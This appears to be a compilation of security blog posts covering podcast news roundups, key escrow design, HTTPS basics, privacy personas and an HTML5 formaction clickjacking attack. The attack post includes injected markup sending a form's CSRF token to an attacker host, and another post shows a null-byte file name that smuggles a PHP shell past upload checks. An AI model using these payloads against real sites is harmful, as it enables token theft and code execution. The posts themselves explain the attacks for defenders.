#HackerKast 31: RSA San Francisco

We have a special and rare treat this week on HackerKast: Jeremiah, Matt and Robert all together in San Francisco for RSAC. They give a brief overview of some of the interesting conversations and topics they’ve come across.

A recurring topic in Robert’s conversations is how DevOps can improve security and help find vulnerabilities faster. Matt mentions Gauntlt, a cool new project he contributes to: it hooks security tools into your build pipeline to test for vulnerabilities before the code goes to production.

Matt also mentions that his buddies at Verizon came out with data showing that people aren’t getting hacked via mobile apps: we haven’t yet seen large data breaches through mobile apps lead to any financial loss. With the recent surge in mobile use for sensitive data, are these types of breaches something we should worry about?

On a more pleasant note, Jer was happy to hear that people and companies are realizing the importance of security. Industry leaders are now showing interest in doing application security the right way through a holistic approach.

Also at RSA, Jer talks security guarantees while Matt/Kuskos dive into our Top 10 Web Hacks.

Speaking of Government Backdoors

After Alex Stamos’ stand-off with Admiral Mike Rogers, I got to thinking about what the Admiral must have meant when he insisted that government “front doors” could be built in a way that didn’t give the government ultimate access. Then a story came out about a split-key approach that is being studied. Let me explain why that is a bad idea, and propose a technically less dangerous alternative.

Setting aside any conversations about the ethics, the legal conundrums, the loss of trust, the weakening of freedoms, the chilling effect, or a future in which we have to provide similar access to any government that asks, there are some legitimate technical reasons this design is bad. First, a brief primer on how split keys work.

Let’s take a simple encryption algorithm that just uses the password “Will Wheaton” to decrypt the plaintext. Now let’s say government agency A (the FBI/NSA or some similar organization) has access to the first half of the password, “Will”. “Will Wheaton” is a very weak password to begin with, but it’s made significantly weaker when one party knows half of the secret. It gets worse, though. Let’s say government agency B (the FISA court) has the second half of the password, “Wheaton”. Eventually the two halves need to be combined somewhere: some physical place where both halves of the password are typed in at the same time. Let’s call it a SCIF for argument’s sake.
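To make that concrete, here is a toy Python sketch (the alphabet and password length are made up for illustration) of how much smaller the brute-force search space becomes once one party already holds half of the secret:

```python
import string

# Toy parameters: a 10-character lowercase password, split escrow-style
# so each agency holds one 5-character half.
alphabet = string.ascii_lowercase
secret_length = 10
half_length = secret_length // 2

full_space = len(alphabet) ** secret_length  # outsider knows nothing
half_space = len(alphabet) ** half_length    # one half already known

print(f"unknown secret: {full_space:,} candidates")  # 141,167,095,653,376
print(f"half known:     {half_space:,} candidates")  # 11,881,376
```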

In this example the SCIF is now the one place where all secrets go, which makes it a prime target for attack. Both parties can now see the data, instead of just one, even though there may be situations where truly only one party should see it. And if the password is the same for every piece of encrypted information across all conversations, abuse is practically guaranteed once both halves are known. Not only is the original encryption significantly easier to break, since each party holds half of the key material, but the design also creates a single place where the two halves have to be combined, and that place is far more likely to be abused.

What happens when access to that user’s data is no longer deemed useful? Does the key simply stop working? What if they find out they were mistaken and the data they were looking at is benign? Is there a way to disable their password? No – that’s not how passwords or keys work when they have to work everywhere, all the time. All they can do is tell Apple, or Google, or whoever created the backdoor to change the user’s keys and/or issue a different backdoor password. That’s one of the major drawbacks of this model. Depending on how it was implemented, it could also inadvertently tip off the suspect if they notice a new key being issued.

Now let’s take a slightly different scenario, where Apple/Google had a rolling window in which the password changed every day. One day it was “Will Wheaton”, the next it was “Darth Vader”, and so on. That way the FBI/NSA and the FISA court could subpoena any piece of information, but it had to be marked with a certain time period (say ten days, for which they would use the corresponding 10 keys, each split into two parts, for a grand total of 20 key-halves). They would only have access to certain pieces of information, only for that one conversation, and nothing after that time period. That has a better chance of being successful, but it still relies on the parties coming together at some point, and it allows both of them to see the resulting classified material.
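A sketch of one way such a rolling window might be implemented, assuming the provider derives each day’s key from a master secret with HKDF so that handing over one day’s key reveals nothing about any other day’s (the function and parameter names here are my own):

```python
import datetime
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

def day_key(master_secret: bytes, day: datetime.date) -> bytes:
    """Derive a distinct 256-bit key for a single calendar day.

    Handing over day_key(secret, tuesday) reveals nothing about any
    other day's key, so access stays scoped to the requested time slice.
    """
    return HKDF(
        algorithm=hashes.SHA256(),
        length=32,
        salt=None,
        info=b"escrow-day:" + day.isoformat().encode(),
    ).derive(master_secret)

k_tuesday = day_key(b"provider master secret", datetime.date(2015, 4, 21))
```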

A more useful approach would be to have four sets of keys for each time-slice of one day. Keys 1 and 2 belong to the FBI/NSA, and keys 3 and 4 belong to the FISA court. Key 1 would decrypt to a blob of further encrypted material that could only be fully decrypted by Key 3 (think of Key 1 as the outer layer of an onion and Key 3 as the inner layer that gets to the center). Likewise, Key 4 would decrypt to a blob of encrypted material that could only be fully decrypted by Key 2. That way you could guarantee that neither key could be subverted to fully decrypt anything without the other party’s involvement. It would also allow either or both parties to see the resulting material should they need it, but never without each other’s approval. And it would guarantee that the key material couldn’t be abused beyond the time slice for the conversation in question.
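Here is a minimal sketch of that onion layering, using symmetric Fernet keys purely for illustration (a real deployment would presumably use public-key escrow; the key names follow the scheme above):

```python
from cryptography.fernet import Fernet

# Hypothetical per-day, per-conversation keys: keys 1 and 2 belong to
# the FBI/NSA, keys 3 and 4 to the FISA court.
k1, k2, k3, k4 = (Fernet.generate_key() for _ in range(4))

plaintext = b"conversation 1234, Tuesday"

# Escrow blob for the FBI/NSA path: FISA's Key 4 is the outer layer,
# the FBI/NSA's Key 2 the inner layer.
blob = Fernet(k4).encrypt(Fernet(k2).encrypt(plaintext))

inner = Fernet(k4).decrypt(blob)               # FISA peels the outer layer,
                                               # but sees only more ciphertext
assert Fernet(k2).decrypt(inner) == plaintext  # FBI/NSA recover the data

# Keys 1 and 3 would mirror this layering for the court's own path.
```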

So here is how it would break down. The FBI/NSA ask FISA for approval to decrypt User A’s conversation with User B. FISA agrees, and the FBI/NSA request that Apple/Google hand over the time slices for Tuesday and Wednesday. Apple/Google respond with conversation identifiers 1234 and 1235 and the corresponding blobs of encrypted text (if the FBI/NSA don’t already have them). The FBI/NSA ask FISA to decrypt the blobs with Key 4(Tuesday) and Key 4(Wednesday), corresponding to conversations 1234 and 1235. FISA returns two encrypted blobs that are useless until the FBI/NSA apply their own Key 2(Tuesday) and Key 2(Wednesday) for the same time slices and conversations. The FBI/NSA decrypt the final blobs and are able to read the conversation. At this point Apple/Google know nothing about the data, only that it was subpoenaed. The FISA court was aware of and complicit in the decryption but never saw the data, and the FBI/NSA got only the data they requested and nothing more. If the court also needs to see the data, the corresponding Keys 1 and 3 are used for the same time slices against the corresponding blobs.

Of course this is a huge burden, because now each user needs four keys created for each day. Assuming there are roughly 3 billion Internet users, each using perhaps 3 different chat systems per day, that would require something like 36 billion keys to be shared between the two government agencies (18 billion each) per day. That’s a lot. Not to mention that the keys wouldn’t just be short passwords, but presumably something like X.509 or GPG keys, which can be quite large. And all of that assumes the agencies can somehow receive those keys in a way that the other (or malicious third parties) can’t intercept or see. The devil lies deep in those details.
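As a quick sanity check on that back-of-the-envelope math:

```python
users = 3_000_000_000        # rough number of Internet users
systems_per_user = 3         # chat systems used per day
keys_per_conversation = 4    # Keys 1-4 in the scheme above

keys_per_day = users * systems_per_user * keys_per_conversation
print(f"{keys_per_day:,} keys per day")          # 36,000,000,000
print(f"{keys_per_day // 2:,} held per agency")  # 18,000,000,000
```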

Ultimately, though, I think Alex Stamos is right to press the government. Our industry thrives on trust, and if people believe that the government is spying on them, they are significantly less likely to transact or act normally – as themselves. Even if we can solve the technical problems, we have to be extremely thoughtful about how, or even whether, we deploy such a system at all. When one’s only crime is one of thought or ideas, this kind of system dramatically increases the likelihood that freedom of expression will be lost to the annals of time. We all have to decide: would we rather have security in the form of Big Brother, or would we rather have privacy? We can’t have both, so we had better make up our minds now, before the decisions are made on our behalf.

Please check out a similar and wonderfully written post by Matthew Green as well.

Web Security for the Tech-Impaired: The Importance of the ’S’

There’s one little letter that has huge importance when you’re logging into sites or buying your favorite items: the letter ’S’. The ’S’ I’m referring to is the ’S’ in HTTPS. You may never have noticed the ’S’ in your web browser, or you may have seen it and never realized its importance. You may know it as that thing that gets added before the website address you type in. What does it mean? Why is it important? You shall find these answers in this post!

HTTP and HTTPS are what are known as ‘protocols’. In essence, a protocol defines how your computer will talk to another computer. As you browse the web, you may notice that some sites use HTTP while others use HTTPS. If you bring up CNN’s home page, edition.cnn.com, you’ll notice that the URL bar shows either http in front of the address or just edition.cnn.com. This shows that the site is using the HTTP protocol to communicate. HTTP is a non-secure way of transmitting data from your computer to the website. Data sent over HTTP can be intercepted and read at any point between you and the website’s computer, in what’s known as a ‘man-in-the-middle’ (MITM) attack. A person listening in on the virtual conversation between your computer and the website’s computer can see all the data being sent. This isn’t a big deal if you’re reading articles on CNN or searching Wikipedia, but what if you log in to a site or buy something from an online store? You certainly don’t want the bad guys to know your username and password or your credit card number, so how do you protect yourself?

This is where the mighty ’S’ comes to the rescue. HTTPS is a way of securely sending data between your computer and the website you are interacting with. If a site is using HTTPS, you’ll see the https in front of the URL. As an example, go to www.facebook.com. In more modern, up-to-date browsers you’ll likely see the HTTPS colored either green or red, along with a lock icon. Green text with the lock icon means you’re communicating securely with the website and everything looks to be in order.

If the https is red, there is probably some issue with the site’s security. It may be that the site’s certificate is out of date or invalid, that the site includes insecure third-party content, or that there are other problems. In any case, if the HTTPS and lock icon are not green, it is always safest not to proceed with any transaction involving information you would like to keep secure.

HTTPS uses a complicated system to encrypt the data you send to the website and vice versa. A bad guy performing an MITM attack will still see the conversation between you and the website, but it will be completely incoherent, like listening to a conversation in a language the two speakers made up. Any time you do anything that requires a login, a credit card number, a social security number, or ANY private data, make sure you see that HTTPS protocol and, if you have the benefit of a modern browser, that the green lock icon is present. NEVER log in or give any sensitive information to a site that does not communicate over HTTPS.

Protecting your Intellectual Property: Are Binaries Safe?

Organizations have been steadily maturing their application testing strategies and in the next several weeks we will be releasing the WhiteHat Website Security Statistics report that explores the outcomes of that maturation.

As part of that research we explored some of the activities undertaken in application security programs, and we were impressed to see that 87% of respondents perform static analysis: 32% with each major release, and 13% daily.

This adoption of testing earlier in the software lifecycle is a welcome move. It is not a simple task for many companies to build out the policies that are essential for driving the maturity of an application security program.

We wanted to explore a policy that seems to have been conflated with the need to gain visibility into third-party software service providers and commercial off-the-shelf software (COTS) vendors’ products.

There seems to be a significant amount of confusion, and perhaps intentional fear, uncertainty and doubt (FUD), in this area. The way you go about testing third-party software should mirror the way you go about testing your own. Where the question of measurable security gets muddled is in the idea that sharing binaries, rather than source, somehow protects your Intellectual Property (IP).

Binaries can easily be decompiled, revealing nearly 100% of the source code. If your organization is distributing the binaries that make up your web application to a third party, you have effectively given them all the source code as well. This conflation of testing policies leads to a false sense of Intellectual Property protection.

Reverse engineering, while requiring some effort, is no real obstacle. Tools such as ILSpy and Show My Code are freely and widely available. Sharing your binaries in an attempt to protect your Intellectual Property actually ends up exposing 100% of your IP.


This video illustrates this point.

Video: “Educational Series: How lost or stolen binary applications expose all your intellectual property” (WhiteHat Security on Vimeo).

While customers are often required by policy to protect their source code, the only way to do that is to protect the binaries as well. That means being careful never to turn on the compilation options that other vendors require to allow binary review. Or, at a very minimum, it requires that those same binaries never get uploaded to production, where they may be exposed via vulnerabilities. Either way, if your requirement is to protect your IP, you need to make certain your binaries don’t fall into the wrong hands, because inside those binaries could be the keys to the castle.

For more information, click here to see the infographic on the two testing methodologies.

Introducing Craig Hinkley, WhiteHat Security CEO

As many of you know, I took on the role of “interim” CEO in February 2014 and, along with the management team, led WhiteHat through a much-needed period of re-strategizing and narrowing our focus onto the needs of our customers. In that time, we made great progress and improved every single metric that matters.

All the while, the Board of Directors and I were diligently searching to find the right person to step in as the permanent CEO. As founder, I may be biased, but WhiteHat is not just another security company. WhiteHat is something special and the work we do, web security, is important to the world. We needed a long-term CEO equal to the task. We needed someone who is passionate about web security and capable of taking WhiteHat to the next level; someone with the right skill set, experience, drive, vision, customer dedication, and most importantly, the ability to execute with us. Every. Single. Day.

At long last, we have found that person. On behalf of everyone here at WhiteHat Security, I am happy to introduce our new CEO, Craig Hinkley. Craig is an accomplished leader and I am confident that he is the right person to build on the foundation and momentum achieved by the WhiteHat team. While Craig’s resume is certainly impressive, it barely begins to do him justice. He’s the type of person who is driven, immediately engaging, and open to new ideas, while inspiring vision and excitement. We look forward to the key leadership he will bring to the WhiteHat team.

Many of you are probably asking, “What does this mean for Jeremiah?” My passion is, and continues to be, Web security, and WhiteHat is the very best place to pursue it. My day-to-day activity will remain largely unchanged: I will be heavily focused on our technology, product innovation, and strategy. With Craig on board, I’ll be freed up to focus more of my time and attention on those critical details.

Now, please join me in welcoming Craig as he takes the helm as CEO of WhiteHat Security.

View the official press release here.

The Perils of Privacy Personas

Privacy is a complex beast, and depending on who you talk to, you get very different opinions of what is required to be private online. Some people really don’t care, and others really do. It just depends on why they care and the lengths they are both willing and able to go to in order to protect that privacy. This is a brief run-down of various persona types. I’m sure people can come up with others, but this is a sampling of the kinds of people I have run across.

Alice (The Willfully Ignorant Consumer)

  • How Alice talks about online privacy: “I don’t have anything to hide.”
  • Alice’s perspective: Alice doesn’t see the issues with online advertising, governmental spying and doesn’t care who reads her email, what people do with her information, etc. She may, in the back of her mind, know that there are things she has to hide but she refuses to acknowledge it. She is not upset by invasive marketing, and feels the world will treat her the same way she treats it. She’s unwilling to do anything to protect herself, or learn anything beyond what she already knows. She’s much more interested in other things and doesn’t think it’s worth the time to protect herself. She will give people her password, because she denies the possibility of danger. She is a danger to all around her who would entrust her with any secrets.
  • Advice for Alice: Alice should do nothing. All of the terrible things that could happen to her don’t seem to matter to her, even when she is advised of the risks. This type of user can actually be embodied by Microsoft’s research paper So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users, which is to say that spending time on security has a negative financial tradeoff for most of the population when taken in a vacuum where one person’s security does not impact another’s.

Bob (The Risk Taker)

  • How Bob talks about online privacy: “I know I shouldn’t do X but it’s so convenient.”
  • Bob’s perspective: Bob knows that bad things do happen, and is even somewhat concerned about them. However, he knows he doesn’t know enough to protect himself, and he is more concerned with usability and convenience. He feels that the more he does to protect himself, the more inconvenient life becomes. He can be summed up with the term “Carpe Diem.” Every one of his passwords is the same. He chooses weak security questions. He uses password managers. He clicks through any warning he sees. He downloads any program he finds, regardless of origin. He interacts on every social media site with a laissez-faire attitude.
  • Advice for Bob: He should pick email/hosting providers and vendors that naturally take his privacy and security seriously. Beyond that, there’s not much else he would be willing to change.

Cathy (The Average Consumer)

  • How Cathy talks about online privacy: “This whole Internet thing is terrifying, but really, what can I do? Tax preparation software, my utilities and email are essential. I can’t just leave the Internet.”
  • Cathy’s perspective: Cathy knows that the Internet is a scary place. Perhaps she or one of her friends has already been hacked. She would pick more secure and private options, but simply has no idea where to start. Everyone says she should take her security and privacy seriously, but how and who should she trust to give her the best advice? Advertisers are untrustworthy, security companies seem to get hacked all the time – nothing seems secure. It’s almost paralyzing. She follows whatever best practices she can find, but doesn’t even know where to begin unless it shows up in whatever publications she reads and happens to trust.
  • Advice for Cathy: Cathy should try to find options that have gone through rigorous third-party testing by asking for certificates of attestation, or attempt to self-host where possible (e.g., local copies of tax software versus Internet-based versions), and follow all best practices for two-factor authentication. She should use ad-blocking software and VPNs, and log out of anything sensitive when finished. Ideally she should use a second browser for banking, separate from the rest of her Internet activity. She shouldn’t click on links in emails, shouldn’t install unknown applications, and shouldn’t download even trustworthy applications from untrustworthy websites. If a site is unknown, has a bad or nonexistent BBB rating, or just doesn’t look “right”, she should avoid it; it may have been hacked or taken over. She should also check the site’s reputation using Web of Trust or similar tools. She should look for the lock in her browser to make sure she is using SSL/TLS. She shouldn’t use public wifi connections. She should install all updates for the software already on her computer, uninstall anything she doesn’t need, and disable any services that aren’t necessary. If anything looks suspicious, she should ask a more technical person for help, and she should keep backups of everything in case of compromise.

Dave (The Paranoid Reporter)

  • How Dave thinks about online privacy: “I know the government is capable of just about anything. So I’ll do what I can to protect my sources, insofar as it still enables me to do my job.”
  • Dave’s perspective: Dave is vaguely aware of some of the programs the various government agencies have in place. He may or may not be aware that other governments are just as interested in his information as the US government. He therefore places trust in poor places, mistakenly thinking he is somehow protected by geography or the rule of law. He will go out of his way to install encryption software, and possibly some browser security and privacy plugins/add-ons, such as ad-blocking software like Disconnect, or maybe even something more draconian like NoScript. He’s downloaded Tor once to check it out, and has a PGP/GPG key, which no one has ever used, posted on his website. He relies heavily on his IT department to secure his computer. But he uses all social media, chats with friends, has an unsecured phone, and still uses third-party webmail for most things.
  • Advice for Dave: For the most part, Dave is woefully unequipped to handle sensitive information online. His phone(s) are easily tapped, his email is easily subpoenaed, and his social media is easily crawled and monitored. His whereabouts are also constantly tracked in several different ways through his phone and social media. He is at risk of putting people’s lives in danger because of how he operates. He needs complete isolation and compartmentalization of his two lives, meaning his work computer and his personal email/social presence should never intertwine. All sensitive work should be done through anonymous networks, using heavily encrypted data that ideally becomes useless after a certain period of time. He should be using burner phones, and he should avoid any easily discernible patterns when meeting with sources in person or talking to sources over the Internet.

Eve (The Political Dissident)

  • How Eve thinks about online privacy: “What I’m doing is life or death. Everyone wants to know who I am. It’s not paranoia if you’re right.”
  • Eve’s perspective: Eve knows the full breadth of government surveillance from all angles. She’s incredibly tuned in to how the Internet is effectively always spying on her traffic. Her life and the lives of the friends and family around her are at risk because of what she is working on. She cannot rely on anyone she knows for help, because doing so would put them, and ultimately herself, at risk in the process. She is well read on all topics of Internet security and privacy, and she takes absolutely every last precaution to protect her identity.
  • Advice for Eve: Eve needs to go to incredible lengths, using false identities to build up personas so that nothing is ever in her name. There should always be a fall-back secondary persona (also known as a backstop) that will take the fall if her primary persona is ever de-anonymized, instead of her actual identity. She should never connect to the Internet from her own house, but rather travel to random destinations and connect to wifi at distances that won’t make it visually obvious. Everything she does should be encrypted. Her operating system should support plausible deniability (e.g., VeraCrypt), and she should actually have a plausibly deniable reason for it to be enabled. She should use a VPN or hacked machines before surfing through a stripped-down version of Tails, running various plugins that ensure her browser is incapable of doing her harm, including NoScript, Request Policy, HTTPS Everywhere, etc. She should never use the same wifi connection twice, and should use different modes of transportation whenever possible. She should never use her own credit card, but instead trade in various forms of online crypto-currencies, pre-paid credit cards, physical cash, and barter. She should use anonymous remailers and avoid using the same email address more than once. She should regularly destroy all evidence of her actions before returning to any place where she might be recognized. She should avoid wearing recognizable outfits and cover her face as much as possible without drawing attention. She should never carry a phone, but if she must, it should have the battery removed. Her voice should never be transmitted, due to voice-prints and phone-line/background-noise forensics. All of her IDs should be kept in a Faraday wallet. She should never create any social media accounts under her own name, never upload a picture of herself or her surroundings, and never talk to anyone she knows personally while surfing online. She should avoid using any jargon, slang or words that are unique to her location. She should never talk about where she is, where she’s from or where she’s going. She should never tell anyone in real life what she’s doing, and she should always have a cover story for every action she takes.

I think one of the biggest problems in our industry is that we tend to give generic, one-size-fits-all privacy advice. As you can see above, this sampling of various types of people isn’t perfect, and it never could be. People’s backgrounds are so diverse and varied that it would be impossible to fit any one person precisely into any bucket. Privacy advice must therefore be tailored to people’s ability to understand it, their interest in protecting themselves, and the actual threat they’re facing.

Also, we are often talking at odds with regard to privacy versus security. Even if we didn’t have to worry about the intentions of those giving advice, as discussed in that video, we still can’t necessarily rely on the advice itself. Nor can we rely on the advice being taken well by the person we give it to. One party might fully believe they’re doing all they need to do, while in fact making things extremely dangerous for those around them who have higher security requirements.

Anything could be a factor in people’s needs, interests, and abilities with regard to privacy – age, sex, race, religion, cultural differences, philosophies, location, which government they agree with, who they’re related to, how much money they have, etc. Who knows how any of those things might impact their privacy concerns and needs? If we give people one-size-fits-all privacy advice, it is guaranteed to be a bad fit for most people.

#HackerKast 30: Verizon Supercookie, Tesla Stock April Fools, Bugs in Tor, YouTube Bounty Hack, ‘Do Not Track’ and Microsoft

Hey All! We made it to 30 Episodes! Thanks for coming along for the ride, and hope you’re enjoying HackerKast. Now… the news!

First we talked about the follow-up to a story from a few weeks back about Verizon tracking its customers. They were doing this by injecting a sort of “supercookie” into HTTP requests on their end. This isn’t something that would go away if you cleared your cache, cookies, browser files, etc. It was basically the glitter of user tracking: it never went away. News this week was that Verizon spokespeople made a hand-wavy announcement that this isn’t a problem, since users can opt out of the tracking if they wish. The problem, as we discuss, is that nobody is going to do that, or even take the time to figure out how to do it via some random Verizon web interface. Bad form on Verizon’s part, and it just shows that the users’ interests are not truly at heart here. The age-old adage of “if you aren’t paying for it, you’re the product” doesn’t even apply, since you ARE paying for Verizon. They are just squeezing your data for more money.

Privacy tangent aside, in lighter news, the stock market is being automated! Lighter news? I guess so, given the context: an April Fools’ joke by Tesla. They announced the brand new ‘Model W’, which caused a bit of a commotion amongst the robots on the Internet. Turns out the Model W wasn’t a new line of Tesla cars but a joke about them making a watch that could do phenomenal things, such as telling time. At the time of the announcement, a bunch of excited robots made Tesla stock jump by nearly 1%, with over 400,000 trades in 60 seconds – the largest surge for Tesla since its IPO. This instance may be funny, but it is a scary thought that a practical joke could have cost people hundreds of thousands of dollars because of some trigger-happy robots.

Next, we talked about some newly discovered and documented issues with Tor. In this case, we are talking about a Denial of Service technique that is unique to Tor Hidden Services. By sending a flood of requests that open “circuits” to a hidden service (circuits act somewhat like sockets), an attacker can overwhelm the server and take it down. Handling a large build-up of these circuits forces the hidden service to burn a ton of CPU and memory. This is being called a bug, but Robert doesn’t like that terminology, because this is by design how hidden services work; it is simply being used maliciously.

Now we are talking about something we all really like the sound of: deleting Justin Bieber videos off the Internet. Well, that was the click bait for this one. The real story is that a researcher found a way to delete any video off of YouTube immediately. Turns out that Google paid this researcher $5,000 for the bug, which we all agreed seemed a bit low for something so serious, but we might not have all the information. The funny part is the researcher describing how hard it was to fight the urge to delete Bieber fan channels. Good bug.

Lastly, Microsoft announced that it will not be supporting ‘Do Not Track’ by default in the next version of their browsers, whatever they are calling them these days. This comes right after ‘Do Not Track’ finally became the default in the latest version of Internet Explorer. It sounds like a loss for user privacy but, in reality, DNT doesn’t really work. Nobody pays attention to it, and it costs extra bandwidth anyway, so there really is no point at this stage in the game.

Thanks for listening! Check us out on iTunes if you want an audio only version to your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay

Resources:
Verizon Customers Can Now Opt Out of Supercookie Due to Government Pressure
Tesla Stockholders Can’t take a Joke
Bugs in Tor Network Used In Attacks Against Underground Markets
YouTube hack ‘threatened’ Justin Bieber videos
‘Do Not Track’ no longer default setting for Microsoft browsers

Notable stories this week that didn’t make the cut:
Turkey Blocks Social Media Again – People Resort to Posters to Educate

#HackerKast 29: China DDoS Github, IAB endorses SSL use in ads, Cisco praising Adblock, SEA hacks Bluehost and more, Google XSS around the world, PHP file upload vuln

Hey Everybody! Welcome to this weeks HackerKast!

The first story we talked about this week was the latest DDoS attack on GitHub, which was coming from China this time. The fact that it was a DDoS wasn’t the interesting bit; it was the method of DDoS we were focusing on. Turns out, the avenue of attack here looked an awful lot like Jeremiah’s and my BlackHat research on “Million Browser Botnet”. The attackers were utilizing Baidu analytics JavaScript to force unknowing browsers to constantly reload two specific GitHub pages. Of course, this is slightly different from ad network delivery, but the concept is pretty much the same. The other scary part is that the attacking browsers were only about 1% of Baidu analytics traffic; if this were ramped up significantly, who knows what it would’ve looked like.

Next, in a related ad network story, we talked about the IAB writing a blog post announcing they would encourage all their members and partners to utilize SSL properly. This got a chuckle from us, because here is the advertising industry advocating security. If it happens, SSL everywhere will be one step closer to being feasible without breaking ad networks. It also would’ve stopped China from man-in-the-middling these ads and injecting anything into them.

Also related, Jeremiah touched on a post put out by Cisco praising ad blocking as a way to combat drive-by malware downloads. We all got a laugh out of this, as we’ve been saying it for years, so it’s funny for somebody like Cisco to say it. None of us is completely against the idea of advertising, but it is dangerous on the Internet.

Back to the hacking: Robert talked about the Syrian Electronic Army hacking the umbrella company that owns BlueHost, Justhost, Hostgator, and more. Thanks to a few VPN hacks, the SEA is claiming they got access to the administrator panels of all of these shared hosting providers, and in turn their customers. This was a hacktivism-motivated event, as these shared hosting providers host Islamic State websites, which the SEA opposes. We wrapped up this topic with some thoughts on shared hosting security overall; it seems to us like a big single point of failure on the web.

In other hacking news, a creative bounty hunter found some fun XSS recently and displayed it in a fun way. This researcher found an XSS bug in Google that not only worked on the .com domains but actually worked on *every* Google TLD around the world. This led them to create a YouTube video called “Google XSS World Tour” with some fun classical music and an ever redirecting browser demonstrating the XSS working on many international Google domains. One bug to rule them all… or something like that…

Last, we talked about a PHP file upload vulnerability that was found this week. It seems the core PHP function move_uploaded_file is vulnerable to a clever bug that bypasses file type validation. By embedding a null byte in the file name, you can upload any file type you’d like and execute malicious code on the PHP web server. A quick search on GitHub for move_uploaded_file turns up 245,006 results of code using this vulnerable function.
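To illustrate the class of bug, here is a hedged Python sketch of why an embedded null byte defeats naive extension checks; the PHP-specific detail is that the underlying C string handling truncates the destination file name at the null byte:

```python
# Attacker-supplied file name: the ".jpg" suffix exists only to fool
# the userland validation check.
filename = "shell.php\x00.jpg"

# Naive validation inspects the full string and is satisfied...
assert filename.lower().endswith(".jpg")

# ...but C-based string handling stops at the null byte, so the file
# lands on disk as "shell.php" and the server executes it as PHP.
effective_name = filename.split("\x00", 1)[0]
print(effective_name)  # shell.php
```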


Thanks for listening! Check us out on iTunes if you want an audio only version to your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay

Resources:
Syrian Electronic Army Hacks BlueHost, Justhost, Hostgator, Fastdomain, Hostmonster to go after Islamic State
Cisco recommends Adblock & Ghostery to combat malvertising
Google XSS World Tour
China’s Man-on-the-Side Attack on GitHub
Adopting Encryption: The Need for HTTPS
Exploiting PHP Upload Forms

Notable stories this week that didn’t make the cut:
Google to drop China’s CNNIC Root Certificate Authority after trust breach
Obama Declares War on Foreign Hackers
AllCrypt Hacked Using Brute Force and Password Reset
The old is new, again. CVE-2011-2461 is back!
Instagram API Bug Could Allow Malicious File Downloads
DEA Charged with Being Mole for Silkroad

#HackerKast 29 Bonus Round: Formaction Scriptless Attack

Today on HackerKast, Matt and I discussed something called a Formaction Scriptless Attack. Content Security Policy (CSP) has put a big theoretical dent in cross-site scripting. I say theoretical because relatively few sites are taking advantage of it yet; but even where CSP is implemented to prevent JavaScript from loading on the page, that doesn’t necessarily remove the possibility of attack via HTML injection.

For example, let’s say you have a site with CSP set up to prevent inline and remote JavaScript from loading, using the nonce feature, which requires all script tags to include the nonce before they will load. The nonce is probably based on some locally known secret XOR’d with the user’s credential, or something similar. Whatever the case, the attacker doesn’t know the CSP nonce. But what the attacker really wants to do is submit some form. Now, the form might protect itself in a different way: a server-generated nonce (a second one) to prevent cross-site request forgeries. Barring any side-channel attacks, MitM attacks, or attacks against the server itself, it seems like this might stop you in your tracks.

HTML5 to the rescue! Let’s say the form has an id set of id="form1". HTML5 has a feature where any input field anywhere on the page (yes, even outside of the form block) can declare that it belongs to any form using the “form” attribute (e.g. form="form1"). That might be somewhat bad on its own, because perhaps I can include an extra form field and make the user do something they didn’t mean to do. But worse yet, HTML5 also has a feature called formaction. Formaction allows me to change the location to which the form is submitted.

So if the attacker injects an input or button that associates itself with the form containing the secret nonce, and also carries a formaction directive pointing the form at the attacker’s website, it’s pretty much game over once the user clicks that button. So now the trick is to get the victim to click on the button. Oh, if only there were a way to get people to click on arbitrary places on a page from another domain… oh wait! Clickjacking!
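To make that concrete, here is a minimal sketch of the kind of markup an attacker might inject (the form, field names, and URLs are hypothetical):

```html
<!-- Already on the page: a CSRF-protected form the attacker cannot read -->
<form id="form1" action="/transfer" method="POST">
  <input type="hidden" name="csrf_token" value="secret-nonce">
</form>

<!-- Injected HTML, no script required: the button joins form1 from
     outside the form block and re-points its submission -->
<button form="form1" formaction="https://attacker.example/steal">
  Click me!
</button>
```

No script runs at any point; one click on the injected button, whether social-engineered or clickjacked, submits the hidden token to the attacker.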

So if the site is using CSP but not using X-Frame-Options or similar techniques to prevent the site from being framed, the attacker can frame the page and force the user to click on the evil button, whose formaction points the form back to the attacker’s site. The attacker then takes the stolen nonce, creates a page that automatically uses it, and forces a CSRF request with the secret nonce. So much for CSRF protection! Here is the original vulnerable page, and here is the clickjacked version of it with semi-opacity enabled to make it easier to see (tested in Firefox only).

Scriptless attacks aren’t new (Mario Heiderich, for example, has been working on them for years), but they are deadly. This isn’t quite the same thing as a cross-domain read, but it has the same effect: it allows the attacker to read information from the target domain for use in an attack. I highly recommend using X-Frame-Options on all your pages, but that only stops one form of the attack; it’s still possible to social engineer people, and so on. Why devs need to associate input fields with forms outside of the form block is still a bit of a mystery to me, and why they need to change the form action after the fact, even overriding the original location, is also a puzzle. But with every new feature comes a new way to abuse it. HTML5 is an interesting beast, that’s for sure!

Update: As mentioned on Twitter, you can use CSP to block formaction, but you have to do so explicitly, or the attack will still work alongside your other CSP rules. You can also do the equivalent of X-Frame-Options in CSP. So a properly configured CSP might actually save you – very cool!

Security and the SDLC: Integrating application security in developer environments

As we wind down the year, I thought it would be good to talk through some big thinking in regard to vuln classification and prioritization. There are two commonly overlooked issues when enterprises attempt to secure themselves:

1. Once a company finds out about a vulnerability, how do they track it? A company can end up with tens of thousands of vulnerabilities or more if their environment is large and complex enough. And we’re not talking about false positives – I mean real, remotely exploitable vulns.
2. How do you ensure the vulnerabilities actually get fixed? Just because you find a vulnerability doesn’t mean your developers know about it, or know to prioritize it, etc. And what if they just claim that it’s fixed…?

The problem is scale. Any off-the-shelf scanner will work fine when you’re talking about one app, or a few apps. Where they fall down is when they have to scan hundreds or thousands of apps. Not only do companies not have the manpower to manage all of those scans and the associated credentials, but even if they did, they’d be left with a huge homework assignment – transcribing thousands of vulns into some system that the developers actually look at.

